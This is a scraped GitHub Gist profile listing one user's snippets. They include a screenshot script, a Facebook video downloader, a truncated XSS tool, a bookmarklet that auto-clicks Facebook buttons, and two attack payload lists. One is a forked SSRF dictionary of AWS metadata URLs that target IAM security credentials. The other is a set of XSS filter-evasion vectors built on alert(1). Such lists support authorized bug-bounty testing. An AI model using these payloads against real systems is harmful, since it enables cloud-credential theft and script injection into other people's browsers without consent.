Skip to content

Instantly share code, notes, and snippets.

View betillogalvan's full-sized avatar

BetilløGalvan betillogalvan

View GitHub Profile
@betillogalvan
betillogalvan / SBSTTS.sh
Created October 23, 2018 23:52
SimpleBashScriptToTakeScreenshots
#Simple bash script to take screenshots
#!/bin/bash
file="/path/urls.txt"
while IFS= read line
do
echo "$line"
firefox -screenshot "$line".png "$line" &>/dev/null
done < "$file"
@betillogalvan
betillogalvan / XS><ILL.py
Created October 23, 2018 10:44
XS><ILL.py
#!/usr/bin/env python
#XS><ILL by B2G
#twitter.com/betillogalvan1
#Requiriments | pip install splinter
import os
import time
from splinter import Browser
#Banner
banner = """
@betillogalvan
betillogalvan / dvff.sh
Created October 16, 2018 00:11
Download Video From Facebook
curl --head https://m.facebook.com/BadabunOficial/videos/2157975401113221/ | grep location | egrep -o "https?:\/\/[^\ ]*" | perl -pe 's/\%(\w\w)/chr hex $1/ge' >> down.txt
echo `cat down.txt` | perl -pe 's/\%(\w\w)/chr hex $1/ge'
cat down.html |perl -pe 's/\%(\w\w)/chr hex $1/ge'| grep 'a'|sed -n 's/.*href="\(.*\)".*/\1/p' | egrep -o "https?:\/\/[^\ ]*" >> result.txt
wget -i result.txt
@betillogalvan
betillogalvan / cloud_metadata.txt
Created October 15, 2018 07:19 — forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@betillogalvan
betillogalvan / js
Last active September 26, 2022 21:05
A
<script>
alert('OPENBUGBOUNTY');
</script>
@betillogalvan
betillogalvan / xssvectors.js
Last active April 20, 2021 12:44
XSS VECTORS
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
alert('HolaSoyBetilloGalvan');
javascript:var inputs = document.getElementsByClassName('uiButton _1sm'); for(var i=0; i<inputs.length;i++) { inputs[i].click(); }